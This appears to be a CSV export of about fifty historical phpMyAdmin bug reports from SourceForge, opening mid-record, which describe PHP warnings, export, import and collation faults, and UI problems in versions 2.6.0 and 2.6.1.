Hello, I am under Konqueror 2.3.0), and it is impossible to display a request using the WHERE option no problem with only SELECT) gt; Warning Undefined variable sql file compression in var www phpmyadmin.myprovider.net phpMyAdmin read dump.php on line 297 The warning is sent before the headers, and then, it sends additional warnings phpMyAdmin libraries ob.lib.php on line 65, phpMyAdmin header.inc.php on line 27, 28, 29, 30 and 32) After the warnings, no SQL reqest is found but it should).
Under other browser such FireFox Linux or Windows) or IE Win), I don t face any problem.
That appears only with Konqueror.
Thanks Original URL https sourceforge.net p phpmyadmin bugs 1511 https sourceforge.net p phpmyadmin bugs 1511 Original author papa6","bug"
"24444","7879","csv compressed export.
when cfg[ AllowAnywhereRecoding ] = TRUE; exporting to csv format choosing charset like iso 8859 1 works but when choosing compression.
Compressed file is then empty.
Original URL https sourceforge.net p phpmyadmin bugs 1512 https sourceforge.net p phpmyadmin bugs 1512 Original author herel Found in version 2.6.0 pl2","bug"
"24444","7880","cfg[ ServerDefault ] = 0 shows php notice.
If you set cfg[ ServerDefault ] = 0 you will get the following notice, on the left frame Notice Undefined index auth type in home www public html phpMyAdmin 2.6.0 left.php on line 380 Original URL https sourceforge.net p phpmyadmin bugs 1513 https sourceforge.net p phpmyadmin bugs 1513 Original author tricera Found in version 2.6.0 pl2","bug"
"24444","7881","Column Privilege while Copying User.
phpMyAdmin 2.6.0 pl2 MySQL 4.1.7 PHP 4.3.5 Apache 1.3.31 Mozilla Firefox 1.0 When copying a user with Column Privileges, it seems that the GRANT statement has an SQL error.
The syntax should be GRANT privilege column1, column2, column3 ) ON table TO user But phpMyAdmin adds erroneous parenthesis like GRANT privilege `column1, column2, column3` ) ON table TO user I have attached a screenshot that illustrate the error message I got Original URL https sourceforge.net p phpmyadmin bugs 1514 https sourceforge.net p phpmyadmin bugs 1514 Original author nosfore Found in version 2.6.0 pl2","bug"
"24444","7882","Call time pass by reference in ...profiling.php.
with php.ini setting allow call time pass reference = Off got this error Warning Call time pass by reference has been deprecated argument passed by value; If you would like to pass it by reference, modify the declaration of [runtime function name] ).
If you would like to enable call time pass by reference, you can set allow call time pass reference to true in your INI file.
However, future versions may not support this any longer.
in .
phpmyadmin libraries dbg profiling.php on line 21 in .
phpmyadmin libraries dbg profiling.php on line 39 in .
phpmyadmin libraries dbg profiling.php on line 55 in .
phpmyadmin libraries dbg profiling.php on line 58 Original URL https sourceforge.net p phpmyadmin bugs 1515 https sourceforge.net p phpmyadmin bugs 1515 Original author x33 Found in version 2.6.0 pl2","bug"
"24444","7883","Undefined variable when editing table indexes.
On my demo machine, when adding or editing table indexes, php throws a warning about an undefined variable.
Notice Undefined variable err url 0 in var www pma.derrabus.de htdocs demos branches HEAD tbl indexes.php on line 64 Linux 2.6.9 Apache 2.0.52 PHP 5.0.2 MySQL 4.1.7 phpMyAdmin 2.6.1 dev latest CVS) Original URL https sourceforge.net p phpmyadmin bugs 1516 https sourceforge.net p phpmyadmin bugs 1516 Original author rabus Found in version Latest Git","bug"
"24444","7884","forgets the default collation when adding fields.
This problem occours when creating a new table.
When editing the field definitions, choose a collation for the table from the dropdown box.
Now, add more fields to the panel and phpMyAdmin will forget the collation choice you ve just made.
I encounter this problem with the latest CVS version of phpMyAdmin, but I m pretty sure that the bug is also in 2.6.0.
Apache 2.0.52 php 5.0.2 MySQL 4.1.7 phpMyAdmin 2.6.1 dev Original URL https sourceforge.net p phpmyadmin bugs 1517 https sourceforge.net p phpmyadmin bugs 1517 Original author rabus Found in version Latest Git","bug"
"24444","7885","Tables not creating from old version export.
Hi, My setup is as follows My system phpMyAdamin 2.6.0 pl3 MySQL 4.1.7 standard running on localhost as root localhost Mac OS X 10.3.6 My host phpMyAdmin 2.5.6 MySQL 3.23.58 running on localhost as nathany localhost Red Hat Linux I was attempting to move data from my host to a newly created database on my local system.
Nothing too fancy, no compression or any of that.
Both Structure drop table, auto increment, enclose field names with backquotes) and Data tried with without complete inserts).
Importing into the new version on my system via SQL Choose File) would take a long, long time, and then say it succeeded with the output of the SQL displayed.
However, no new tables were added.
Dropping back to phpMyAdmin 2.5.5 on my system worked just fine.
nj Original URL https sourceforge.net p phpmyadmin bugs 1518 https sourceforge.net p phpmyadmin bugs 1518 Original author nathany Found in version 2.6.0 pl3","bug"
"24444","7886","Inserting UNIX TIMESTAMP doesnt use provided data.
When I do Insert, I select UNIX TIMESTAMP from the pulldown menu, and in the blank to the right I type a date 2004 10 3 2 00 00 for example).
When I hit Go, I get a response like this from phpMyAdmin Inserted rows 1 SQL query INSERT INTO `test` `thetime` ) VALUES UNIX TIMESTAMP ) ); Please note the lack of the provided data in the UNIX TIMESTAMP ).
2.5.7 pl1 is confirmed to work fine.
I m using 2.6.0 pl3.
2.6.0 pl2 is broken also.
FIX I have removed UNIX TIMESTAMP from line 140 in tbl replace.php and now it works.
Has the above functionality from 2.5.7) been removed on purpose?
Original URL https sourceforge.net p phpmyadmin bugs 1519 https sourceforge.net p phpmyadmin bugs 1519 Original author epit Found in version 2.6.0 pl3","bug"
"24444","7887","Cannot login to host when port entered.
After upgrading to 2.6.0 pl3 the following happens when connecting to http host port phpMyAdmin I get the initial login screen without the clipper graphic); after login, it says cannot connect to http hostport phpMyAdmin index.php .
Notice the is missing!
Original URL https sourceforge.net p phpmyadmin bugs 1520 https sourceforge.net p phpmyadmin bugs 1520 Original author deltasig Found in version 2.6.0 pl3","bug"
"24444","7888","no database creation priv.
with coockie enables authentication i can not create new database, reload usertable and others!
with the same account root or other user with root rights) and name pass in config mode all works well!
On this server I use the latest phpMyAdmin, MySql 3.23.52 and PHP 4.2.2 Original URL https sourceforge.net p phpmyadmin bugs 1521 https sourceforge.net p phpmyadmin bugs 1521 Original author fbaier Found in version 2.6.0 pl3","bug"
"24444","7889","unable to submit selected server.
Problem select server.lib.php, row 29,74 lt;select name= server onchange= this.form.submit ); gt; form cannot be triggered, if required server is already active the first one is active) Solution Change lt;noscript gt; lt;input type= submit value= lt;?php echo strGo; ?
gt; gt; lt; noscript gt; To lt;input type= submit value= lt;?php echo strGo; ?
gt; gt; Original URL https sourceforge.net p phpmyadmin bugs 1522 https sourceforge.net p phpmyadmin bugs 1522 Original author jamaz Found in version 2.6.0 pl2","bug"
"24444","7890","PMA fails with mbstring.func overload=7.
I had set mbstring.func overload=7 overload all) for testing purposes.
phpMyAdmin pirnted lots of error messages.
With mbstring.func overload=0 anything seems to work well.
Maybe you should check mbstring.func overload in future versions.
Original URL https sourceforge.net p phpmyadmin bugs 1523 https sourceforge.net p phpmyadmin bugs 1523 Original author webgear Found in version 2.6.0 pl3","bug"
"24444","7891","can not change theme from drop menu MSIE).
In version 2.6.0 pl3 I can no longer use the Theme Style drop menu on the main page to change the theme..
Original URL https sourceforge.net p phpmyadmin bugs 1524 https sourceforge.net p phpmyadmin bugs 1524 Original author csyntax Found in version 2.6.0 pl3","bug"
"24444","7892","Wrong Records count on InnoDB table.
Hi.
Thanks for this wonderful software.
Now to a wonderful problem.
;) I tried to find it mentioned somewhere, but had no luck, so here we go.
I have the following table in my database 4.0.22 on Debian GNU Linux) CREATE TABLE thes relations sterm INTEGER NOT NULL, reltype ENUM USE , UF , BT , NT , RT , TT , PT ) NOT NULL, tterm INTEGER NOT NULL, UNIQUE sterm,tterm,reltype), KEY sterm), KEY tterm), KEY reltype), FOREIGN KEY sterm) REFERENCES thes terms id), FOREIGN KEY tterm) REFERENCES thes terms id) ) TYPE=InnoDB COMMENT= Stores relations between terms.
; In the table are a few entries mysql gt; SELECT COUNT ) FROM thes relations; | COUNT ) | | 84153 | 1 row in set 0.05 sec) Now when I go to the table overview that is shown when selecting a database in the left frame, the number of records shown in the Records column constanly changes with each page load.
I have already seen numbers between 40000 and 110000 instead of the expected 84153.
There are no changes to the database happening, and COUNT )ing always gives the same result as above).
There are four other InnoDB tables in that database, none shows similar behaviour.
If you need more information, let me know.
Regards, Karsten Original URL https sourceforge.net p phpmyadmin bugs 1525 https sourceforge.net p phpmyadmin bugs 1525 Original author k fish Found in version 2.6.0 pl3","bug"
"24444","7893","headers sent on invalid login.
Hey all, Not really a bug, but decided to mention it anyway as it might be usefull in the FAQ or something.
I have set up authentication through the config file with the following settings cfg[ Servers ][ i][ auth type ] = config ; cfg[ Servers ][ i][ user ] = user ; cfg[ Servers ][ i][ password ] = password ; cfg[ Servers ][ i][ AllowDeny ][ order ] = explicit ; cfg[ Servers ][ i][ AllowDeny ][ rules ] = array allow from 192.168.1.
[111 117] ); ofcourse, when I log in through 127.0.0.1 I am not allowed to enter myphpadmin.. so far so good Since it is a development server I m working on the php setting error reporting is set to E ALL, so all errors will be noticed.. and it generates the following error when I try to connect through a machine that is not allowed.
Warning mysqli errno ) expects parameter 1 to be mysqli, null given in H \webadmin\admin sql\libraries\dbi\mysqli.dbi.lib.php on line 190 Warning Cannot modify header information headers already sent by output started at H \webadmin\admin sql\libraries\dbi\mysqli.dbi.lib.php 190) in H \webadmin\admin sql\libraries\auth\config.auth.lib.php on line 81 Warning Cannot modify header information headers already sent by output started at H \webadmin\admin sql\libraries\dbi\mysqli.dbi.lib.php 190) in H \webadmin\admin sql\libraries\select theme.lib.php on line 92 Since as you can see) myphpadmin can only be reached by local machines also setup through apache) it is no problem for me, also one can change the error reporting easily so it won t show up.. but I thought to bring it to your attention anyway since even small errors basicly give away the entire site structure.
FYI..
I am using MySQL 4.1.7 PHP 5.0.2 MyPHPAdmin 2.0.6pl3 Apache 2.0.52 on Windows XP Pro Kind regards, Original URL https sourceforge.net p phpmyadmin bugs 1527 https sourceforge.net p phpmyadmin bugs 1527 Original author awgerritsen Found in version 2.6.0 pl3","bug"
"24444","7894","error modifying multiple rows.
Hi, I have cfg[ PropertiesIconic ] set to both Now under the HTML table with the content of the DB I have 3 icons standing for an action what to do with the selected records.
I select multiple records and click on the pen Edit) I get error lt;b gt;Notice lt; b gt; Undefined variable submit mult in lt;b gt;C \Webs\phpMyAdmin\tbl row delete.php lt; b gt; on ... A notice is in fact no problem, but it appears before any other content of the XHTML output; thus noting other than the error message is put out.
The IE shortens the message and does not allow to view it full...
When PropertiesIconic is set to FALSE and I click on the Edit button everything works fine.
Greetings, Bernhard Original URL https sourceforge.net p phpmyadmin bugs 1526 https sourceforge.net p phpmyadmin bugs 1526 Original author bardware","bug"
"24444","7895","Link to Passwordchange does not exist.
My User Reported, that his link to change the password is missing.
As root i do have that link.
After calling the site user password.php manually he hat the chance to change his pwd.
Original URL https sourceforge.net p phpmyadmin bugs 1528 https sourceforge.net p phpmyadmin bugs 1528 Original author gatemaster Found in version 2.6.0 pl3","bug"
"24444","7896","Field name isn t quoted on export.
Hi, phpMyAdmin is really cool, but ...
It doesn t quote MySQL fields called order used for my menu SQL table).
Bye, Haypo Original URL https sourceforge.net p phpmyadmin bugs 1529 https sourceforge.net p phpmyadmin bugs 1529 Original author haypo Found in version 2.6.0 pl2","bug"
"24444","7897","Single quotes are repeated on export to sql format.
Hi Guys, I m using PHP 4.3.8, Apache 1.3.31, phpMyAdmin2.6.0 rc3 and MySQL 3.23.58.
On exporting to SQL format, any single quote characters in text fields are converted to two single quotes, eg some text with marks in it becomes some text with in it .
Note they are not converted to double quotes, but two single quotes side by side.
It only happens with export to SQL format, not CSV, LaTex etc.
I ve tried with magic quotes gpc on and off with no difference.
Any ideas?
A bug or config error?
Best Regards, Justin Original URL https sourceforge.net p phpmyadmin bugs 1530 https sourceforge.net p phpmyadmin bugs 1530 Original author webscope2 Found in version 2.6.0 rc3","bug"
"24444","7898","Parameter passing to bookmarks.
I am trying to use the following bookmark SELECT `cpu name`,`ip` FROM `computers` WHERE ip = [VARIABLE] When I pass in 192.168.1.45, PHPMyAdmin expands the code to this SELECT `cpu name`,`ip` FROM `computers` WHERE ip = \{1\}192.168.1.45 \{2\} The query does not work.
Original URL https sourceforge.net p phpmyadmin bugs 1531 https sourceforge.net p phpmyadmin bugs 1531 Original author jhouchin9 Found in version 2.6.0 pl3","bug"
"24444","7899","ctrl shift left arrow.
When in row edit mode; When pressing ctrl shift left arrow, in a HTML form filed, you expect the previous word to be marked, but phpmyadmins moves the cursor to the previous HTML field.
Internet Explorer 6, WinXP Pro SP2.
Original URL https sourceforge.net p phpmyadmin bugs 1532 https sourceforge.net p phpmyadmin bugs 1532 Original author lirbank Found in version 2.6.0 pl2","bug"
"24444","7900","Undefined variable field charset.
We are on... phpMyAdmin 2.6.0 pl2 redhat f2) This error came up in the logfiles...
I hope it helps you fix any problems...
Thanks in advance, Ajos1.
[client 212.104.129.221] PHP Notice Undefined variable field charset in usr share phpmyadmin tbl addfield.php on line 66, referer http 83.245.15.80 phpmyadmin tbl addfield.php Original URL https sourceforge.net p phpmyadmin bugs 1533 https sourceforge.net p phpmyadmin bugs 1533 Original author ajos1 Found in version 2.6.0 rc2","bug"
"24444","7901","Escaping percent sign when deleting multiple rows.
When selecting some rows with this query SELECT FROM `TABLE` WHERE type LIKE deutsch and check one or more rows and then click the Delete button below, the rows are corretly deleted, but the query that is displayed in the SQL query Box is transformed SELECT FROM `TABLE` WHERE type LIKE xc5xa2utsch de was transformed to the character value 222.
This does not happen when deleting single rows with the Delete link.
Versions phpMyAdmin 2.6.0 pl3, MySQL 4.0.20 debug, Mozilla 1.7.2 Win2k.
Original URL https sourceforge.net p phpmyadmin bugs 1534 https sourceforge.net p phpmyadmin bugs 1534 Original author sailorstarfire Found in version 2.6.0 pl3","bug"
"24444","7902","More than one INDEX key was created for column.
The below table is a perfectly correct table, but phpmyadmin is showing this More than one INDEX key was created for column `myInt` CREATE TABLE `adams db` `myString` varchar 255) NOT NULL, `myInt` int 11) NOT NULL, `myInt2` int 11) NOT NULL, `key` bigint 20) NOT NULL auto increment, PRIMARY KEY `key`), KEY `myInt2` `myInt2`), KEY `myInt` `myInt`,`key`), KEY `myInt 2` `myInt`,`myInt2`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO INCREMENT=1 ; I really like the idea, but it needs to take into all of the keys into consideration.
Donny Original URL https sourceforge.net p phpmyadmin bugs 1535 https sourceforge.net p phpmyadmin bugs 1535 Original author donsimon Found in version Latest Git","bug"
"24444","7903","Misleading comments in upgrade tables....
The comments in the upgrade tables mysql 4 1 2 .sql script are misleading.
They state that the script expects the user pma to already exist, but in fact the SQL statements do not make use of the pma user.
I believe the comments were copied from one of the create .sql scripts and not changed to fit their new purpose.
The comments also say that, for use with MySQL 4.1.0 or 4.1.1, the create tables.sql script should be used, and then the upgrade script.
Can that be correct?
That sounds weird.
Original URL https sourceforge.net p phpmyadmin bugs 1536 https sourceforge.net p phpmyadmin bugs 1536 Original author ryandesign Found in version 2.6.1 rc1","bug"
"24444","7904","Incorrectly duplicated constraints in export.
I have one database with InnoDB foreign key constraints b ) and others that don t use this a , c and d ).
When I tried to export my entire database as an SQL file, I was surprised to find that SQL statements were added at the end of the export for databases c and d to add the foreign key constraints for tables and fields that only exist in database b .
This of course means I can t later import this SQL file.
There must be a variable that accumulates the InnoDB constraints that s not getting cleared at the top of a loop.
Original URL https sourceforge.net p phpmyadmin bugs 1537 https sourceforge.net p phpmyadmin bugs 1537 Original author ryandesign Found in version 2.6.1 rc1","bug"
"24444","7905","Gzipped export not importing.
If I select the gzipped compression option for an export, I cannot import the resulting file without manually decompressing it first.
I get a failure on import if I have autodetect selected or gzipped selected for the input file I am uploading.
I tried to import the file back to the Linux box that created the file and to my OS X box, both using 2.6.1 rc1.
This is using a nightly build of Camino a Mac Gecko browser).
If I manually decompressed the file or downloaded the SQL file uncompressed, I could successfully import it using phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin bugs 1538 https sourceforge.net p phpmyadmin bugs 1538 Original author alex t king Found in version 2.6.1 rc1","bug"
"24444","7906","Default theme ignored when theme manager disabled.
I m not sure if this is a bug or if I just got the documentation wrong.
The documentation says that you can disable user selectable themes by setting cfg[ ThemeManager ] to FALSE.
The whole truth is that this results in cfg[ ThemeDefault ] being ignored and the default theme being used instead.
In my opinion it should still be allowed to force a theme by setting cfg[ ThemeDefault ] even if the theme manager is disabled.
At least this is what I need in my current project. )
I ve attached a patch that changes this behavior.
You be the judge.
Original URL https sourceforge.net p phpmyadmin bugs 1539 https sourceforge.net p phpmyadmin bugs 1539 Original author ndabezitha Found in version 2.6.0","bug"
"24444","7907","No data showed at all.
No data is showed at all in any type of SELECT statements.
Only the counts displayed are correct and I can page forward but all with totally empty pages!
This should definite not be labeled as a release candidate.
Original URL https sourceforge.net p phpmyadmin bugs 1540 https sourceforge.net p phpmyadmin bugs 1540 Original author joergent Found in version 2.6.1 rc1","bug"
"24444","7908","Database name use in error page.
Execute these SQL statements use phpmyadmin ; select from whatever ; There is no table whatever in the database phpmyadmin so this produces an error.
But the header of the error page reads Server fusion Database use Table whatever fusion is my server, but Database use doesn t make any sense.
It should say Database phpmyadmin and since there is no table whatever it probably shouldn t say Table whatever either.
Happens in PMA 2.6.1 rc1 with MySQL 4.1.7 on Mac OS X 10.3.6 with PHP 5.0.2 and Apache 1.3.33, and also in PMA 2.6.0 pl2 with MySQL 4.0.22 on Gentoo Linux with PHP 4.3.9 and Apache 2.0.52.
Browser in both cases is Safari 1.2.4.
Original URL https sourceforge.net p phpmyadmin bugs 1541 https sourceforge.net p phpmyadmin bugs 1541 Original author ryandesign Found in version 2.6.1 rc1","bug"
"24444","7909","Pretty printer problem with SET NAMES.
Execute this SQL SET NAMES latin1; SELECT FROM lt;some table gt;; The pretty printer shows SET in bold purple as expected, but NAMES is in normal width black text; I expected this to also be bold purple.
Also, there is no space between NAMES and latin1.
Original URL https sourceforge.net p phpmyadmin bugs 1542 https sourceforge.net p phpmyadmin bugs 1542 Original author ryandesign Found in version 2.6.1 rc1","bug"
"24444","7910","End >> and large InnoDB tables.
If I have an InnoDB table with, say, 300,000 records, and I browse it, and the record count approximation shows me that there are 416,342 records, and I then click the End gt; gt; button to get to the very end of the list, then I just get back to the structure page and PMA says it was an empty result set because PMA tries to get n records starting at 416,342 which doesn t work).
PMA needs to, when I click the End gt; gt; button, use SELECT COUNT ) to determine the actual end and use that instead of the wildly inaccurate approximation.
There are other related comments suggestions pleas from me at bug 1046174.
Original URL https sourceforge.net p phpmyadmin bugs 1543 https sourceforge.net p phpmyadmin bugs 1543 Original author ryandesign Found in version 2.6.1 rc1","bug"
"24444","7911","Errors Inserting Updating records.
Not sure what caused this to happen.
It was working fine and then when I try to add update records I get these errors UPDATE ERRORS Warning reset ) Passed variable is not an array or object in usr local cpanel base 3rdparty phpMyAdmin tbl replace.php on line 81 Warning Invalid argument supplied for foreach ) in usr local cpanel base 3rdparty phpMyAdmin tbl replace.php on line 132 Warning Cannot modify header information headers already sent by output started at usr local cpanel base 3rdparty phpMyAdmin tbl replace.php 81) in usr local cpanel base 3rdparty phpMyAdmin libraries common.lib.php on line 1332 INSERT RECORD ERRORS Warning reset ) Passed variable is not an array or object in usr local cpanel base 3rdparty phpMyAdmin tbl replace.php on line 81 Warning Invalid argument supplied for foreach ) in usr local cpanel base 3rdparty phpMyAdmin tbl replace.php on line 132 Warning Invalid argument supplied for foreach ) in usr local cpanel base 3rdparty phpMyAdmin tbl replace.php on line 132 Warning Cannot modify header information headers already sent by output started at usr local cpanel base 3rdparty phpMyAdmin tbl replace.php 81) in usr local cpanel base 3rdparty phpMyAdmin libraries ob.lib.php on line 61 Warning Cannot modify header information headers already sent by output started at usr local cpanel base 3rdparty phpMyAdmin tbl replace.php 81) in usr local cpanel base 3rdparty phpMyAdmin libraries header http.inc.php on line 14 Warning Cannot modify header information headers already sent by output started at usr local cpanel base 3rdparty phpMyAdmin tbl replace.php 81) in usr local cpanel base 3rdparty phpMyAdmin libraries header http.inc.php on line 15 Warning Cannot modify header information headers already sent by output started at usr local cpanel base 3rdparty phpMyAdmin tbl replace.php 81) in usr local cpanel base 3rdparty phpMyAdmin libraries header http.inc.php on line 16 Warning Cannot modify header information headers already sent by output started at usr local cpanel base 3rdparty phpMyAdmin tbl replace.php 81) in usr local cpanel base 3rdparty phpMyAdmin libraries header http.inc.php on line 17 Warning Cannot modify header information headers already sent by output started at usr local cpanel base 3rdparty phpMyAdmin tbl replace.php 81) in usr local cpanel base 3rdparty phpMyAdmin libraries header http.inc.php on line 20 Originally I was on 2.5.6 and have upgraded to 2.6.0 pl3 Upgrade was part of CPanel upgrade from 9.4.1.R64 to 9.9.9 R10) MySQL 4.0.22 Don t see any errors in Status Page PHP Originally 4.3.8, upgraded to 4.3.9 To be clear, the errors were received before and after all the upgrades.
Original URL https sourceforge.net p phpmyadmin bugs 1544 https sourceforge.net p phpmyadmin bugs 1544 Original author l810c Found in version 2.6.0 pl3","bug"
"24444","7912","pb with rtrim ) in read dump.lib.php.
rtrim ) does accept 1 parameter only before PHP 4.1.0. in read dump.lib.php function PMA splitSqlFile ret, sql, release) \{ sql = rtrim sql, \n\r ); because of this line, phpmyadmin doesn t submit any sql command solution uncomment or use rtrim sql) instead Original URL https sourceforge.net p phpmyadmin bugs 1545 https sourceforge.net p phpmyadmin bugs 1545 Original author ptilou72 Found in version 2.6.1 rc1","bug"
"24444","7913","Illegal SQL passed.
When creating a new table using LONGTEXT and setting a maximum length attempt to pass that to MySQL resulting in MySQL syntax error.
phpMyAdmin 2.6.0 pl3 MySQL 4.0.22 standard PHP 4.3.9 I m guessing a similar situation occurs with other datatypes where size specification is illegal but have not checked.
The invalid SQL is the section ... `rowname` LONGTEXT 5242880) ... for example.
Suggested fix The following assertion in tbl addfield.php if field length[ i] != !preg match DATE|DATETIME|TIME|TINYBLOB|TINYTEXT|BLOB|TEXT|MEDIUMBLOB|MEDIUMTEXT|LONGBLOB|LONGTEXT) i , field type[ i])) \{ query .= .
field length[ i] . )
; \} should be copied for tbl create.php to avoid the illegal SQL.
Kind regards, mjec michael.cordover gmail.com Original URL https sourceforge.net p phpmyadmin bugs 1546 https sourceforge.net p phpmyadmin bugs 1546 Original author mjec Found in version 2.6.0 pl3","bug"
"24444","7914","Wrong code in database interface.lib.php.
file phpMyAdmin 2.6.1 rc1\libraries\database interface.lib.php orig wrong) if empty collation connection) || strpos , collation connection) ?
substr collation connection, 0, strpos , collation connection)) collation connection) == mysql charset) \{ must be fixed incorrect strpos values) if empty collation connection) || strpos collation connection, ) ?
substr collation connection, 0, strpos collation connection, )) collation connection) == mysql charset) \{ Original URL https sourceforge.net p phpmyadmin bugs 1547 https sourceforge.net p phpmyadmin bugs 1547 Original author meithar Found in version 2.6.1 rc1","bug"
"24444","7915","Constraints not copied when copying db tbl.
See summary...
Original URL https sourceforge.net p phpmyadmin bugs 1548 https sourceforge.net p phpmyadmin bugs 1548 Original author nijel Found in version Latest Git","bug"
"24444","7916","Blowfish Algorithm and cookie undefined vars.
Apache Info Apache Version Apache 2.0.52 Unix) mod ssl 2.0.52 OpenSSL 0.9.7a DAV 2 PHP 5.0.2 Apache API Version 20020903 PHP Info Server API Apache 2.0 Handler Virtual Directory Support enabled Configuration File php.ini) Path etc php.ini Scan this dir for additional .ini files etc php.d PHP API 20031224 PHP Extension 20040412 Zend Extension 220040412 Debug Build no Thread Safety enabled phpMyAdmin 2.6.1 rc1 OS Linux 2.6.9 1.6 FC2smp 1 SMP Thu Nov 18 22 31 11 EST 2004 x86 64 If the application is opened for the first time it gives error and warning messages due to empty PHP AUTH USER and default user.
So to fix that right now I have just modified libraries auth cookie.auth.lib.php file to have these two variables checked properly.
this fixes are done near line 453 and 85 Also if for the blowfish libraries blowfish.php) modules in function decryptBlock near line 438 there is an unchecked variable assignment to L and R So I have added the conditions to check for those variable availability.
I believe these two files need fixes.
Thanks Chandra Original URL https sourceforge.net p phpmyadmin bugs 1549 https sourceforge.net p phpmyadmin bugs 1549 Original author sudhach Found in version 2.6.1 rc1","bug"
"24444","7917","different database order.
Databases are sorting different in left menu and list of BDs.
This is in effect size of chars in DB name.
PMA is runnig on localhost, but is connected to other server PC local php5.0.0, WinXP server php4.3.4, MySQL 4.0.21, SuSE Linux Original URL https sourceforge.net p phpmyadmin bugs 1550 https sourceforge.net p phpmyadmin bugs 1550 Original author jenix","bug"
"24444","7918","2.6.1 rc1 create database disallowed for privileged users.
While logged in in phpMyAdmin 2.6.1 rc1 as a privilieged user, it is reported that databases cannot be created Create new database x No Privileges However, databases actually can be created by using the SQL qeury window Your SQL query has been executed successfully Query took 0.0650 sec) SQL query CREATE DATABASE bug Original URL https sourceforge.net p phpmyadmin bugs 1551 https sourceforge.net p phpmyadmin bugs 1551 Original author deining Found in version 2.6.1 rc1","bug"
"24444","7919","PDF creation not possible.
In phpMyAdmin 2.6.1 rc1 you can no longer create a PDF file containing the structure of your database, although everything works when using 2.6.0 pl3 or earlier!
That s odd.
The pma database is functional and phpMyAdmin does NOT report an outdated version of the DB.
That s why I presume it s due to an error in the code.
Original URL https sourceforge.net p phpmyadmin bugs 1552 https sourceforge.net p phpmyadmin bugs 1552 Original author colony7 Found in version 2.6.1 rc1","bug"
"24444","7920","CSS problems running PMA under non standard HTTP port.
When running the 2.6.0 pl3 under a non standard HTTP port for example port 8443) the CSS values for displaying text, links and tables aren t loaded for the main right frame) window.
Theres no problems with the left frame it works as supposed.
It dosen t help setting the correct including port) cfg[ PmaAbsoluteUri ] setting.
Nor does the patch mentioned in http sourceforge.net forum forum.php?forum id=424914 help.
I m sorry I haven t had the time to investigate where in the code css the problem is.
But I have verified the problem also exists in version 2.6.0 pl2 I suspect it started with the theme introduction but I m not sure).
Kind regards from an old phpMyAdmin developer ) Geert Lund Original URL https sourceforge.net p phpmyadmin bugs 1554 https sourceforge.net p phpmyadmin bugs 1554 Original author glund Found in version 2.6.0 pl3","bug"
"24444","7921","SQL Query input field highlights text, overwriting clipboard.
This is not a high priority bug , it is more or less an annoyance I ve experienced for ... well, a very long time The annoyance occurs on the Run SQL query queries on database page.
The problem occurs when I attempt to give focus to the input field that holds the default text SELECT FROM `some table` WHERE 1 .
The result is contrary to what I want Instead of merely receiving focus, the entire text value of the input field is selected.
While this behavior is not negative when I m executing simple queries, it impedes my ability to paste information into the field because the select action over writes the contents of the clipboard.
For instance, let s say I have a hash string I want to find various entries for.
Of course I m not going to type out the string manually, I ll first copy it, and then switch to my browser window, and finally go into the PhpMyAdmin tab.
I ll click on SQL and proceed to click inside the input field.
All of the text is selected, thus copying it, and over writing my copied hash string.
Oh, I m using PhpMyAdmin 2.6.0 pl2.
My Web browser is Mozilla Firefox 1.0, although, I experienced the same with Opera 7.54.
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 1553 https sourceforge.net p phpmyadmin bugs 1553 Original author kylegibson Found in version 2.6.0 pl2","bug"
"24444","7922","Undefined variable default function.
When browsing any table in any database, clicking the edit icon on any record, displays partial output and the following one or more times PHP Notice Undefined variable default function in ...wwroot\phpMyAdmin\tbl change.php on line 473 Windows XP Prof l SP2 phpMyAdmin 2.6.0 pl3 PHP version 4.3.9 mySQL client version 3.23.49 mySQL server version 4.1.5 gamma nt Original URL https sourceforge.net p phpmyadmin bugs 1555 https sourceforge.net p phpmyadmin bugs 1555 Original author peterinsb","bug"
"24444","7923","Left frame not updated when a MySQL error occurs.
When you enter a query that results in an error, the left frame in not refreshed.
This means that if the query deleted or created a table and the error occured later in the query, this change isn t shown in the left frame.
Original URL https sourceforge.net p phpmyadmin bugs 1556 https sourceforge.net p phpmyadmin bugs 1556 Original author squishycube","bug"
"24444","7924","Funky filename when exporting zipping.
The filename goes a little something like this hit it!)
database.sql.zip.sql Not a big problem, but funky ) Original URL https sourceforge.net p phpmyadmin bugs 1557 https sourceforge.net p phpmyadmin bugs 1557 Original author po0ky Found in version 2.5.7 pl1","bug"
"24444","7925","Attempts to set collation on non text fields.
If I have a VARCHAR field and try to change it to a BLOB, phpMyAdmin generates this SQL ALTER TABLE `table` CHANGE `field` `field` BLOB CHARACTER SET utf8 COLLATE utf8 general ci NOT NULL And MySQL complains 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near CHARACTER SET utf8 COLLATE utf8 general ci NOT NULL at line 1 I believe PMA should generate this SQL instead ALTER TABLE `table` CHANGE `field` `field` BLOB NOT NULL It s the PMA CVS snapshot from 2005 01 01, with MySQL 4.1.8, PHP 5.0.3 and Apache 1.3.33 on Mac OS X 10.3.7.
Original URL https sourceforge.net p phpmyadmin bugs 1558 https sourceforge.net p phpmyadmin bugs 1558 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7926","Control arrow problem with select menus in Safari.
An advertised PMA feature is that you can hold down Control while pressing the arrow keys to navigate between form elements.
In Safari, this works for moving between text boxes, but if you move into a select menu, then you cannot use this method to move out of the select menu again.
For example, when defining fields for a table, I can Control up and down between the field name fields, and I can Control right to get to the Type select menu.
But I cannot Control right or left or anything now to navigate off of the Type menu again.
I can Tab or Shift Tab) to move to the next or previous) text field, but this is not as convenient, and in cases where there are three select menus in a row Collation, Attributes, Null), there is therefore no way to access the middle select menu from the keyboard.
In Firefox 1.0, for comparison, there is no problem.
PMA CVS snapshot 20050101, Safari 1.2.4 v125.12), MySQL 4.1.8, PHP 5.0.3, Apache 1.3.33, Mac OS X 10.3.7.
Original URL https sourceforge.net p phpmyadmin bugs 1559 https sourceforge.net p phpmyadmin bugs 1559 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7927","Gzipping twice.
[ line 519 586 88 ), col 13 53 24 ), char 19406 21735 89 ) ] changed dump buffer = gzencode dump buffer); to dump buffer = gzencode dump buffer); Is the server gzipping the dump buffer twice?
I used my hex editor to remove 15 additional bytes at the header beginning of the file it outputs, finding that, afterwards, the gzip file was only then useful.
Any ideas why this is happening?
Paul Original URL https sourceforge.net p phpmyadmin bugs 1560 https sourceforge.net p phpmyadmin bugs 1560 Original author januspaul Found in version 2.6.1 rc1","bug"
